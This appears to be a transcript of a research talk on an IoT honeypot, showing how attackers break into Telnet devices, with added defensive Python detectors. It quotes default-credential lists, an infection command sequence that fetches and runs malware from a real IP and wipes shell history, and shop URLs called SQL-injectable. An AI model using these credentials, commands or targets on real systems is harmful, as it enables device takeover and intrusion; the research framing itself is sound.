Talk 2

The document discusses the motivations behind hacking, focusing on financial and political values, and presents the IoTPOT, an IoT honeypot and sandbox for monitoring attacks on IoT devices. It outlines various attack patterns, malware evolution, and the significance of security practices in preventing intrusions. Additionally, it highlights opportunities for security jobs and studies in Japan, emphasizing the importance of cybersecurity in today's digital landscape.


Tracing the Hacker

Dr. Yin Minn Pa Pa

2017/12/30
Yangon Technological University
Why do they HACK?

• Financial Value
• Political Value


Today's Talk
1. IoTPOT - IoT Honeypot & Sandbox
2. Fake Organizational Sandbox
3. Security Jobs & Study in Japan


Monitoring Attacks on IoT devices? Wanna know….
Malware
• How many families?
• How fast does malware evolve?
• Botnet or worm?
• Different CPU architectures?
Targets
• How many different types of devices are targeted?
• Is a particular device targeted?
Monetization
• How do hackers make money?
IoTPOT - IoT Honeypot & Sandbox
• Honeypot: IoT devices listening on Telnet
• Sandbox: IoT malware of different CPU architectures: ARM, MIPSEL, SUPERH, PPC, X86, MIPS
IoTPOT: IoT Honeypot & Sandbox (architecture diagram)
Components labelled in the diagram:
• Front end Responder: faces the Internet over Telnet and handles Banners, Authentication and Command Interaction with the attacker
• Profiler: scans the Internet and stores device Profiles that the Responder uses
• Manager: takes Unknown Commands from the Responder, passes them to the Sandbox and records Learnt command interactions
• Downloader: fetches the malware the attacker asks for
• Sandbox: runs samples for Multiple CPU Architectures
Attack Flow (diagram)
Actors: Hacker or already infected IoT device; Malware DL server; C&C server
1. Brute-force login attempts after a scan of 23/TCP
2. Series of Telnet commands
3. Download malware (binary or shell script) from the malware DL server
4. Attack command from the C&C server, e.g. DoS
No Video and Photo Please ……
Widely Used Login Trials (username/password)
user/user, root/ipcam_rt5350
root/default, root/3
root/root, root/anko
guest/123456, root/vertex25ektks123
root/vizxv, admin/changeme
admin/1234, admin/ho4uku6at
admin/admin, root/33333
support/support, root/ttnet
root/default
telecomadmin/nE7jA%5m, root/zlxx.
admin/daemon
root/xc3511, guest/12345
root/antslq, root/5up
root/1001chin, admin/atlantis
Censored
root/admin, admin/Ait
root/123456, naadmin/naadmin
root/12345, guest/guest
admin/password, Administrator/admin
1234/1234, root/t0talc0ntr0l4!
root/12341234, root/7ujMko0vizxv
root/changeme, admin/TRUE
admin/CenturyL1nk, admin/QwestM0dem
root/123123, volition/volition
admin/nCwMnJVGag, admin/admin1234
root/password, support
admin/aquario, root/33333333
root/hunt5759, root/xmhdipc
admin/pass, administrator/changeme
ID/Password Patterns (Intrusion)
Columns of the slide's table: Pattern Name, Challenge Order, Username/Password list.

Fixed Order 1 (challenge order: fixed):
root/root, root/admin, root/1234, root/12345, root/123456, root/1111, root/password, root/dreambox

Random Order 1 (challenge order: random):
root/root, root/admin, root/12345, root/123456, admin/root

Fixed Order 2 (challenge order: fixed):
admin/admin, admin/362729, admin/m4f6h3, admin/n3wporra, admin/263297, admin/fdpm0r, admin/1234

Random Order 2 (challenge order: random):
root/1234, root/xc3511, root/123456, root/12345, root/root, guest/guest, guest/12345, admin/ (empty password)

Fixed Order 3 (challenge order: fixed):
root/root, root/admin, root/ (empty password), root/1234, root/123456, root/1111, root/password, root/dreambox, root/vizxv

Random Order 3 (challenge order: random):
root/root, root/toor, root/admin, root/user, ….
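As an added example (not part of the talk or of IoTPOT), this is the classification a honeypot operator could run over Telnet login logs to tell a fixed-order dictionary attacker from a random-order one, as the pattern table above distinguishes them. The log line format and the two dictionary subsets are constructed here for illustration; it also handles the case where a successful login cuts the sequence short.

```python
import re
from collections import defaultdict

# Two login dictionaries modelled on the talk's pattern table (subset, for illustration)
DICTIONARIES = {
    "pattern-1": ["root/root", "root/admin", "root/1234", "root/12345",
                  "root/123456", "root/1111", "root/password", "root/dreambox"],
    "pattern-2": ["admin/admin", "admin/362729", "admin/m4f6h3", "admin/n3wporra",
                  "admin/263297", "admin/fdpm0r", "admin/1234"],
}

# Constructed log format, one line per login attempt (not the honeypot's real format)
LOG_RE = re.compile(r"src=(?P<src>\S+) user=(?P<user>\S*) pass=(?P<pw>\S*) result=(?P<res>\w+)")

def parse_attempts(lines):
    """Group credential attempts per source address, keeping arrival order."""
    per_src = defaultdict(list)
    for line in lines:
        m = LOG_RE.search(line)
        if m:
            per_src[m["src"]].append(m["user"] + "/" + m["pw"])
    return per_src

def classify(tried):
    """Return (dictionary name, challenge order) for one source's attempts, or None."""
    # A successful login ends the sequence, so a fixed-order attacker may show only
    # a prefix of its dictionary; a random-order one draws the same list unordered.
    if len(tried) < 2:  # a single probe is too short to judge
        return None
    for name, dictionary in DICTIONARIES.items():
        if tried == dictionary[:len(tried)]:
            return name, "Fixed Order"
        if set(tried) <= set(dictionary) and len(set(tried)) == len(tried):
            return name, "Random Order"
    return None

def classify_log(lines):
    """Map every source address in the log to its detected intrusion pattern."""
    return {src: classify(tried) for src, tried in parse_attempts(lines).items()}

# Constructed sample log: a fixed-order attacker, a random-order one, an unknown one, a single probe
SAMPLE_LOG = [
    "2015-04-01T10:00:01 src=10.0.0.1 user=root pass=root result=fail",
    "2015-04-01T10:00:02 src=10.0.0.1 user=root pass=admin result=fail",
    "2015-04-01T10:00:03 src=10.0.0.1 user=root pass=1234 result=success",
    "2015-04-01T10:00:04 src=10.0.0.2 user=root pass=12345 result=fail",
    "2015-04-01T10:00:05 src=10.0.0.2 user=root pass=root result=fail",
    "2015-04-01T10:00:06 src=10.0.0.2 user=root pass=1111 result=success",
    "2015-04-01T10:00:07 src=10.0.0.3 user=admin pass=admin result=fail",
    "2015-04-01T10:00:08 src=10.0.0.3 user=test pass=test result=fail",
    "2015-04-01T10:00:09 src=10.0.0.4 user=root pass=root result=fail",
]
```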
Example of Command
1. Remove various existing commands (ELF) and files
• /bin/busybox rm -rf /usr/bin/killall /usr/bin/wget /usr/bin/tftp /usr/bin/ftpget /bin/rm /bin/ps /bin/ls /bin/netstat /bin/kill /bin/cp /bin/mv /bin/wget /bin/killall /bin/reboot >/dev/null 2>&1; /bin/busybox ZORRO
• /bin/busybox rm -rf /var/run/* /dev/* >/dev/null 2>&1; /bin/busybox ZORRO
2. Prepare customized shell
• /bin/busybox mkdir -p /home/app; /bin/busybox ZORRO
• /bin/busybox cp -f /bin/sh /home/app/ygr && /bin/busybox ZORRO
• /bin/busybox echo -ne \\x7F\\x45\\x4C\\x46\\x1\\x1\\x1\\x61\\x0\\x0\\x0\\x0\\x0\\x0\\x0\\x0\\x2\\x0\\x28\\x0\\x1\\x0\\x0\\x0\\x94\\x80\\x0\\x0\\x34\\x0\\x0\\x0\\x20\\xE\\x0\\x0\\x2\\x0\\x0\\x0\\x34\\x0\\x20\\x0\\x3\\x0\\x28\\x0\\x5\\x0\\x4\\x0\\x0\\x0\\xE >> /home/app/ygr && /bin/busybox ZORRO .....
Example of Command (continued)
3. Download malware binary using attacker's own shell
• /home/app/ygr
  YESHELLO
• /home/app/ygr 37.220.109.5 61050 37.220.109.5 /wb.arm /home/app/MbgcuEv
  YESHELLO
4. Execute downloaded binary and remove record
• /bin/busybox echo -ne '' > /home/app/ygr; /bin/busybox rm -rf /home/app/ygr; /bin/busybox ZORRO
• /home/app/MbgcuEv
  YESHELLO
• rm -rf $HOME/.*history
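As an added example (not from the talk or from IoTPOT), this is a detector a honeypot operator could run over a captured Telnet session: it flags the infection markers seen in the command sequence above and decodes the ELF header the attacker writes with echo -ne, which reveals the CPU architecture the dropper targets (the bytes in the talk decode to a 32-bit little-endian ARM executable). The marker names, the sample session and the log format are constructed here; the e_machine values are the standard ELF constants for the architectures the sandbox covers, so the decoder also generalizes to MIPS, MIPSEL, PPC, SuperH and x86.

```python
import re
import struct

# Standard ELF e_machine values for the CPU architectures the IoTPOT sandbox covers
EM_NAMES = {0x03: "X86", 0x08: "MIPS", 0x14: "PPC", 0x28: "ARM", 0x2A: "SUPERH"}

# Regex markers taken from the infection command sequence shown above (labels constructed)
INFECTION_MARKERS = {
    "busybox sentinel": r"/bin/busybox ZORRO",
    "ELF written via echo": r"echo -ne '?\\x7F\\x45\\x4C\\x46",
    "history wiped": r"rm -rf .*/\.\*history",
}

def decode_echo_escapes(text):
    """Turn the \\xH or \\xHH escapes that echo -ne accepts into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r"\\x([0-9A-Fa-f]{1,2})", text))

def elf_header_info(data):
    """Return (bits, endianness, machine) for an ELF header prefix, else None."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = 32 if data[4] == 1 else 64           # EI_CLASS
    endian = "LE" if data[5] == 1 else "BE"     # EI_DATA
    (e_machine,) = struct.unpack_from("<H" if endian == "LE" else ">H", data, 18)
    machine = EM_NAMES.get(e_machine, "unknown 0x%02x" % e_machine)
    if machine == "MIPS" and endian == "LE":
        machine = "MIPSEL"                      # the sandbox lists MIPSEL separately
    return bits, endian, machine

def classify_session(commands):
    """Report which infection markers a Telnet session hits and what ELF it drops."""
    hits = {label for c in commands for label, rx in INFECTION_MARKERS.items() if re.search(rx, c)}
    dropped = None
    for c in commands:
        m = re.search(r"echo -ne '?((?:\\x[0-9A-Fa-f]{1,2})+)", c)
        if m:
            dropped = elf_header_info(decode_echo_escapes(m.group(1)))
    return hits, dropped

# Constructed sample session modelled on the talk's command sequence (single
# backslashes here; the slide shows them doubled as typed over Telnet)
SAMPLE_SESSION = [
    "/bin/busybox mkdir -p /home/app; /bin/busybox ZORRO",
    "/bin/busybox echo -ne '\\x7F\\x45\\x4C\\x46\\x1\\x1\\x1\\x61\\x0\\x0\\x0\\x0\\x0\\x0\\x0\\x0"
    "\\x2\\x0\\x28\\x0\\x1\\x0\\x0\\x0' >> /home/app/ygr && /bin/busybox ZORRO",
    "/home/app/MbgcuEv",
    "rm -rf $HOME/.*history",
]
```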
Commands Patterns (Infection)
Demo
Downloaded Malware by Honeypot
• During 81 days of operation (April 01 to June 20, 2015): 481,521 malware download attempts
• Host count (bar chart): Visit 180,581; Login 130,314; Download Malware 79,935
Malware / Monetization
Table columns: Intrusion (ID/Password pattern), Infection (command pattern), Downloaded binaries, Monetization (attacks). Summary of what the slide's table shows, per malware family:

ZORRO family
• Intrusion: Fixed Order 1 (2015/01 to 2015/04); Fixed Order 3 (2015/06)
• Infection: ZORRO 1 (2015/01), ZORRO 2 (2015/04), ZORRO 3 (2015/06), ZORRO 4 (2015/06)
• Binaries: Bin 1 (8 architectures), Bin 2-9 (8 architectures), Bin 68-75 (7 architectures), Bin 76-82 (7 architectures)
• Monetization: DoS

GAYFGT family (2014/11 to 2015/06)
• Intrusion: Random Order 1 (2015/04); Random Order 3 (2015/06); No Authentication (2015/06); *.sh family with only one-time authentication (2015/06)
• Infection: GAYFGT 1 (2014/11), GAYFGT 2 (2015/06)
• Binaries: Bin 10-16 (8 architectures, 2014/11), Bin 17-24 (8 architectures, 2015/02), Bin 25-32 (9 architectures, 2015/04; some binaries are now obfuscated), Bin 33-41 (8 architectures, 2015/05), Bin 55-62 (5 architectures, 2015/06), Bin 63-67 (5 architectures, 2015/06), Bin 83-87 (6 architectures, 2015/06), Bin 88-93 (5 architectures, 2015/06), Bin 45-49 (5 architectures, 2015/06), Bin 50-54 (5 architectures, 2015/06), Bin 94-98 (8 architectures, 2015/06), Bin 99-106
• Monetization: Telnet scan; TCP scan (ports 80, 8080, 5916); UDP scan (ports 123, 3143)

nttpd family
• Intrusion: Fixed Order 2
• Infection: Nttpd 1 (2015/04), Nttpd 2 (2015/05)
• Binaries: Bin 42 (MIPS, 2015/04), Bin 44 (MIPS, 2015/05)
• Monetization: Scan

KOS family
• Intrusion: Random Order 2
• Infection: KOS (2015/04)
• Binaries: Bin 43 (MIPS, 2015/04)
• Monetization: Fake Web Hosting
From Research (diagram): infected IoT devices scan other IoT devices and are used for DoS
Targeted IoT devices (56 different types), for example:
• LED display control system
• Solid State Recorder
• Data Acquisition Server
• Wireless Router
• GSM Router
• TV Receiver
• IP Phone
• Parking Management System
• VoIP Telephony System
• Fire Alarm
• Security Appliance
• Internet Communication Module
• Video Broadcaster
Categorizing Device Types
• Surveillance Group
  – IP Camera
  – DVR
• Networking Related Devices
  – Router
  – Gateway
  – Modem
  – Bridge
  – Security Appliance
• Telephone System
  – VoIP Gateway
  – IP Phone
  – GSM Router
  – Analog Phone Adapter
• Infrastructure
  – Parking Management System
  – LED display control system
• ICS
  – Solid State Recorder
  – Internet Communication Module
  – Data Acquisition Server
• Personal
  – Web Camera
  – Personal Video Recorder
  – Home Automation Gateway
• Broadcasting Facility
  – Digital Video Broadcaster
  – Digital Video Scaler
  – Video Encoder/Decoder
  – Set Top Box
• Other
  – Heat Pump
  – Fire Alarm System
  – Disk Recording System
  – Optical Imaging Facility
Best Practices
• Never use default passwords, including on:
  • Printers
  • Network attached storage
  • Cameras
• Check before you buy
• Update firmware
• Block ports that are not used
• Block remote access
Fake Organizational Sandbox

General Attack to Organizations (diagram)
Stages labelled 1 to 4: Backdoor; Command & Control Server; lateral (movement); Data / Escalation

STARDUST - NICT (diagram)
Attacker; Real Network A, B, C; Parallel Network A, B, C

Fake Organizational Sandbox
C&C CONNECTION: XXX.XXX, XXX.XXX, XXX.XXX (addresses censored)
STARDUST: XXX.XXX

His place?
YOUSSEF's activity
• PayPal ID/Password
• Proxy IP/Port
• Censored
• Access Token
No Photo / No Video please!
Activities of YOUSSEF
Censored

Downloaded files by YOUSSEF
• SQL Injection Tool
• VPN Tool
• Proxy Tool
• PayPal Drive2.0
• etc.

SQLi ask v.8.0
• Exploitable URL (Japan)
  • www.reddshop.com/product_listing.php/catid=4
  • Censored
  • www.bagelbagel.jp/shop/index.php?id=5
  • www.pinoy-market.com/store.php?id=136
Best Practices
• People
  • Never click attachments of unknown mail
  • Never access unknown websites
  • Never use USB devices, or check them before use
  • Use strong passwords and update them regularly
  • Never share what is unknown; never believe what is not sure
  • Training
• Technology
  • Network
  • Firewall and gateway antivirus
  • IPS / IDS
  • Endpoint security
• Process
  • Incident response manual
Security Jobs
Security Job Titles
• Employers
  • Government
  • Fortune 500s (finance)
  • Tech Vendors
  • Big Consulting
• Types
  • Full Time
  • Contract
• Average Salary (JP)
  • Graduate Entry Level: 25 ~ 35
  • Middle Level: 40 ~ 60
  • Advanced Level: 100 ~ 1000
IT to Security (four diagrams mapping IT backgrounds to security roles)
Security roles shown in every diagram: System Engineer (Security), Security Tester, Malware Analyst, Malware Researcher, Pentester, Consultant, Forensic Engineer
• Application Security background: OS, Android, Web app, Developer, Programming, Mobile, DB; leads toward Malware (Static) Researcher
• Network Security background: Linux, Networking, Wireless, System Admin, Cloud, Monitoring; leads toward Malware (Dynamic) Researcher
• IoT Security background: Embedded Devices, Protocol, Hardware, Industrial Control System, Robot, Car
• Self Study: CTF, Wargame, Game
Study in Japan (diagram)
Labels in the diagram: Graduate in Myanmar; Scholarships (Private Sector, Public Sector); Study at a Japanese University; University; Job (Japanese Company, OJT, Part time); SEMON
Last
• Smart Enough

• Kind Enough

• Care Enough
Q&A
Hacker = bad person? Hacker or Attacker?
• Hacker: Good person + Tech
• Attacker: Bad person + Tech
